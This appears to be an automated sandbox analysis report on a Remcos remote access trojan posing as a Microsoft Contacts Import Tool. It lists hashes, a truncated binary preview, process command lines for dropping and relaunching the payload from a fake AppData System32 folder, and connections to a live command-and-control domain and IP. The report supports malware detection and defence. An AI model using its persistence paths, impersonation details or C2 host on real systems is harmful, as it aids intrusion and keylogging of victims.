                                      SHA1:D582FBA993502C81733E9F2CB3195177F1B55E0C
                                      SHA-256:055AD5F7137CB6C0C5BDC94A2B37ED87B3F60FF907E22FED2B78B65EE8131EF4
                                      SHA-512:01D54938C91D0D7BCA76622BEF430DB3A2652617E017C6EE69CAB6CD5CEFAC1324F7722405C3A42C2F40EF5FF898CF2D1F4CBEBB9E43C016EA7EF2052FEFD5E9
                                      Malicious:false
                                      Preview: ..[2021/04/29 06:03:20 Offline Keylogger Started]....[ Program Manager ]..
                                      C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Process:C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1912320
                                      Entropy (8bit):3.1643433187668584
                                      Encrypted:false
                                      SSDEEP:24576:DFQF36FFFFFvFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFmFFFFFFFvlFFFFFFce5:6N
                                      MD5:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      SHA1:58ADF5D60D9DA823A4FD62282C0C46134E20E47B
                                      SHA-256:EB9E13FD092522E4DDE08E96961117F9926E3EF70CA3B225F8C388E476541A21
                                      SHA-512:5D27CD110E8D62D6D3E48F20ECD09C715FE5A98E7C9CE8042559F1D6E8A6CE0D666D262A536B2376B8E2D99BEB7CE50DD53E238E2F37DF118630945B5CBB4B87
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 11%
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0..Z...........y... ........@.. ....................................@..................................x..O............................`....................................................... ............... ..H............text...4Y... ...Z.................. ..`.rsrc................\..............@..@.reloc.......`.......,..............@..B.................y......H...........<J...........-...............................................*".(.....*^..}.....(#......(.....*...s%...}......(&..... ... ....s'...((.....(....o)....*&.(......*".......*".(-....*Vs....(....t.........*....0...........r...p....r...p....s............(...+o........88.......(............(........(.................(....o....&.....(............:...................o..........o........8........*..........j........0...........r...p....r.).p....s............(...+o........88
                                      C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe:Zone.Identifier
                                      Process:C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview: [ZoneTransfer]....ZoneId=0

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):3.1643433187668584
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:EXTRACTOSERFINANZA989543704031499704092798964.exe
                                      File size:1912320
                                      MD5:2e91e5e3d39ce4155edad4f2a3acf916
                                      SHA1:58adf5d60d9da823a4fd62282c0c46134e20e47b
                                      SHA256:eb9e13fd092522e4dde08e96961117f9926e3ef70ca3b225f8c388e476541a21
                                      SHA512:5d27cd110e8d62d6d3e48f20ecd09c715fe5a98e7c9ce8042559f1d6e8a6ce0d666d262a536b2376b8e2d99beb7ce50dd53e238e2f37df118630945b5cbb4b87
                                      SSDEEP:24576:DFQF36FFFFFvFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFmFFFFFFFvlFFFFFFce5:6N
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..Z...........y... ........@.. ....................................@................................

                                      File Icon

                                      Icon Hash:e8d2aab2b2aac6e8

                                      Static PE Info

                                      General

                                      Entrypoint:0x5b792e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0x9BCFD6C0 [Fri Nov 1 15:56:48 2052 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:v4.0.30319
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al

                                      Data Directories

                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1b78dc | 0x4f | .text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1b8000 | 0x1cfc8 | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1d6000 | 0xc | .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                      Sections

                                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x2000 | 0x1b5934 | 0x1b5a00 | False | 0.155268137675 | data | 2.63705355617 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rsrc | 0x1b8000 | 0x1cfc8 | 0x1d000 | False | 0.501868938578 | data | 6.4735551931 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc | 0x1d6000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      Name | RVA | Size | Type | Language | Country
                                      RT_ICON | 0x1b8358 | 0x2e8 | data | |
                                      RT_ICON | 0x1b8640 | 0x128 | GLS_BINARY_LSB_FIRST | |
                                      RT_ICON | 0x1b8768 | 0xea8 | data | |
                                      RT_ICON | 0x1b9610 | 0x8a8 | data | |
                                      RT_ICON | 0x1b9eb8 | 0x6c8 | data | |
                                      RT_ICON | 0x1ba580 | 0x568 | GLS_BINARY_LSB_FIRST | |
                                      RT_ICON | 0x1baae8 | 0x4dfe | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
                                      RT_ICON | 0x1bf8e8 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | |
                                      RT_ICON | 0x1d0110 | 0x25a8 | data | |
                                      RT_ICON | 0x1d26b8 | 0x10a8 | data | |
                                      RT_ICON | 0x1d3760 | 0x988 | data | |
                                      RT_ICON | 0x1d40e8 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                      RT_GROUP_ICON | 0x1d4550 | 0xae | data | |
                                      RT_VERSION | 0x1d4600 | 0x3b4 | data | English | United States
                                      RT_MANIFEST | 0x1d49b4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |
                                      RT_MANIFEST | 0x1d4ba0 | 0x428 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States

                                      Imports

                                      DLL | Import
                                      mscoree.dll | _CorExeMain

                                      Version Infos

                                      Description | Data
                                      LegalCopyright | Microsoft Corporation. All rights reserved.
                                      InternalName | WABMIG.EXE
                                      FileVersion | 10.0.19041.1 (WinBuild.160101.0800)
                                      CompanyName | Microsoft Corporation
                                      ProductName | Microsoft Windows Operating System
                                      ProductVersion | 10.0.19041.1
                                      FileDescription | Microsoft (R) Contacts Import Tool
                                      OriginalFilename | WABMIG.EXE
                                      Translation | 0x0409 0x04b0

                                      Possible Origin

                                      Language of compilation system | Country where language is spoken | Map
                                      English | United States |

                                      Network Behavior

                                      Snort IDS Alerts

                                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                      04/29/21-06:04:29.595758 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 190.255.84.57 | 192.168.2.4

                                      Network Port Distribution

                                      TCP Packets

                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Apr 29, 2021 06:03:22.093986034 CEST | 49745 | 3521 | 192.168.2.4 | 190.255.84.57
                                      Apr 29, 2021 06:03:25.213989019 CEST | 49745 | 3521 | 192.168.2.4 | 190.255.84.57
                                      Apr 29, 2021 06:03:31.308777094 CEST | 49745 | 3521 | 192.168.2.4 | 190.255.84.57
                                      Apr 29, 2021 06:03:44.513653040 CEST | 49748 | 3521 | 192.168.2.4 | 190.255.84.57
                                      Apr 29, 2021 06:03:47.622138023 CEST | 49748 | 3521 | 192.168.2.4 | 190.255.84.57
                                      Apr 29, 2021 06:03:53.716386080 CEST | 49748 | 3521 | 192.168.2.4 | 190.255.84.57
                                      Apr 29, 2021 06:04:06.869000912 CEST | 49766 | 3521 | 192.168.2.4 | 190.255.84.57
                                      Apr 29, 2021 06:04:09.874087095 CEST | 49766 | 3521 | 192.168.2.4 | 190.255.84.57
                                      Apr 29, 2021 06:04:15.874754906 CEST | 49766 | 3521 | 192.168.2.4 | 190.255.84.57
                                      Apr 29, 2021 06:04:29.006686926 CEST | 49769 | 3521 | 192.168.2.4 | 190.255.84.57
                                      Apr 29, 2021 06:04:32.016485929 CEST | 49769 | 3521 | 192.168.2.4 | 190.255.84.57
                                      Apr 29, 2021 06:04:38.017028093 CEST | 49769 | 3521 | 192.168.2.4 | 190.255.84.57
                                      Apr 29, 2021 06:04:51.151000977 CEST | 49770 | 3521 | 192.168.2.4 | 190.255.84.57
                                      Apr 29, 2021 06:04:54.174685001 CEST | 49770 | 3521 | 192.168.2.4 | 190.255.84.57

                                      UDP Packets

                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Apr 29, 2021 06:02:43.454569101 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:43.503628969 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:02:43.859802008 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:43.908530951 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:02:44.106476068 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:44.172774076 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:02:44.180191040 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:44.229023933 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:02:45.107434988 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:45.174494028 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:02:47.665630102 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:47.730156898 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:02:49.176529884 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:49.229974031 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:02:50.348942995 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:50.398953915 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:02:51.423789024 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:51.488185883 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:02:52.381906986 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:52.433588982 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:02:53.354599953 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:53.406126976 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:02:54.519345999 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:54.573196888 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:02:55.749684095 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:55.817378998 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:02:56.759664059 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:56.808357954 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:02:57.842421055 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:57.896568060 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:02:59.254333973 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:02:59.303237915 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:00.540998936 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:00.589854002 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:01.472764015 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:01.537764072 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:02.668081045 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:02.735783100 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:03.937710047 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:03.986946106 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:07.756164074 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:07.807713032 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:08.766443968 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:08.818208933 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:12.206897974 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:12.272460938 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:14.767347097 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:14.817346096 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:21.927835941 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:22.082907915 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:26.437913895 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:26.511660099 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:38.330403090 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:38.400993109 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:44.444633961 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:44.511746883 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:44.870590925 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:45.026945114 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:45.482738018 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:45.547255039 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:46.048403025 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:46.103840113 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:46.153162956 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:46.184199095 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:46.572345972 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:46.642214060 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:47.091453075 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:47.155605078 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4
                                      Apr 29, 2021 06:03:47.602248907 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 29, 2021 06:03:47.666398048 CEST53492288.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:47.971096039 CEST5979453192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:48.049556971 CEST5591653192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:48.051131010 CEST53597948.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:48.114056110 CEST53559168.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:48.672195911 CEST5275253192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:48.736809969 CEST53527528.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:49.386353970 CEST6054253192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:49.453772068 CEST53605428.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:49.835624933 CEST6068953192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:49.901920080 CEST53606898.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:50.991413116 CEST6420653192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:51.062911034 CEST53642068.8.8.8192.168.2.4
                                      Apr 29, 2021 06:04:06.806560993 CEST5090453192.168.2.48.8.8.8
                                      Apr 29, 2021 06:04:06.868102074 CEST53509048.8.8.8192.168.2.4
                                      Apr 29, 2021 06:04:23.020593882 CEST5752553192.168.2.48.8.8.8
                                      Apr 29, 2021 06:04:23.069497108 CEST53575258.8.8.8192.168.2.4
                                      Apr 29, 2021 06:04:23.697201014 CEST5381453192.168.2.48.8.8.8
                                      Apr 29, 2021 06:04:23.761574030 CEST53538148.8.8.8192.168.2.4
                                      Apr 29, 2021 06:04:28.928894043 CEST5341853192.168.2.48.8.8.8
                                      Apr 29, 2021 06:04:29.000085115 CEST53534188.8.8.8192.168.2.4
                                      Apr 29, 2021 06:04:51.080096960 CEST6283353192.168.2.48.8.8.8
                                      Apr 29, 2021 06:04:51.149888992 CEST53628338.8.8.8192.168.2.4

                                      ICMP Packets

                                      Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                      Apr 29, 2021 06:04:29.595757961 CEST | 190.255.84.57 | 192.168.2.4 | d30a | (Host unreachable) | Destination Unreachable

                                      DNS Queries

                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                      Apr 29, 2021 06:03:21.927835941 CEST | 192.168.2.4 | 8.8.8.8 | 0xaa7b | Standard query (0) | databasepropersonombrecomercialideasearchwords.services | A (IP address) | IN (0x0001)
                                      Apr 29, 2021 06:03:44.444633961 CEST | 192.168.2.4 | 8.8.8.8 | 0xcff4 | Standard query (0) | databasepropersonombrecomercialideasearchwords.services | A (IP address) | IN (0x0001)
                                      Apr 29, 2021 06:04:06.806560993 CEST | 192.168.2.4 | 8.8.8.8 | 0xce61 | Standard query (0) | databasepropersonombrecomercialideasearchwords.services | A (IP address) | IN (0x0001)
                                      Apr 29, 2021 06:04:28.928894043 CEST | 192.168.2.4 | 8.8.8.8 | 0xe884 | Standard query (0) | databasepropersonombrecomercialideasearchwords.services | A (IP address) | IN (0x0001)
                                      Apr 29, 2021 06:04:51.080096960 CEST | 192.168.2.4 | 8.8.8.8 | 0x61ff | Standard query (0) | databasepropersonombrecomercialideasearchwords.services | A (IP address) | IN (0x0001)

                                      DNS Answers

                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                      Apr 29, 2021 06:03:22.082907915 CEST | 8.8.8.8 | 192.168.2.4 | 0xaa7b | No error (0) | databasepropersonombrecomercialideasearchwords.services | - | 190.255.84.57 | A (IP address) | IN (0x0001)
                                      Apr 29, 2021 06:03:44.511746883 CEST | 8.8.8.8 | 192.168.2.4 | 0xcff4 | No error (0) | databasepropersonombrecomercialideasearchwords.services | - | 190.255.84.57 | A (IP address) | IN (0x0001)
                                      Apr 29, 2021 06:04:06.868102074 CEST | 8.8.8.8 | 192.168.2.4 | 0xce61 | No error (0) | databasepropersonombrecomercialideasearchwords.services | - | 190.255.84.57 | A (IP address) | IN (0x0001)
                                      Apr 29, 2021 06:04:29.000085115 CEST | 8.8.8.8 | 192.168.2.4 | 0xe884 | No error (0) | databasepropersonombrecomercialideasearchwords.services | - | 190.255.84.57 | A (IP address) | IN (0x0001)
                                      Apr 29, 2021 06:04:51.149888992 CEST | 8.8.8.8 | 192.168.2.4 | 0x61ff | No error (0) | databasepropersonombrecomercialideasearchwords.services | - | 190.255.84.57 | A (IP address) | IN (0x0001)

                                      Code Manipulations

                                      Statistics: CPU Usage, Memory Usage, High Level Behavior Distribution and Behavior (interactive charts)

                                      System Behavior

                                      General

                                      Start time:06:02:49
                                      Start date:29/04/2021
                                      Path:C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe'
                                      Imagebase:0xab0000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.706118629.0000000003969000.00000004.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      General

                                      Start time:06:02:53
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                      Imagebase:0x11d0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:06:02:54
                                      Start date:29/04/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:06:02:54
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\timeout.exe
                                      Wow64 process (32bit):true
                                      Commandline:timeout 1
                                      Imagebase:0xb30000
                                      File size:26112 bytes
                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:06:02:56
                                      Start date:29/04/2021
                                      Path:C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
                                      Imagebase:0xab0000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Remcos_1, Description: Remcos Payload, Source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                      Reputation:low

                                      General

                                      Start time:06:02:58
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
                                      Imagebase:0x980000
                                      File size:147456 bytes
                                      MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:06:02:58
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6880 -s 1496
                                      Imagebase:0xbd0000
                                      File size:434592 bytes
                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:high

                                      General

                                      Start time:06:03:01
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'
                                      Imagebase:0x11d0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:06:03:01
                                      Start date:29/04/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:06:03:02
                                      Start date:29/04/2021
                                      Path:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Imagebase:0x8e0000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.771805512.000000000559E000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.766450964.0000000002DE1000.00000004.00000001.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
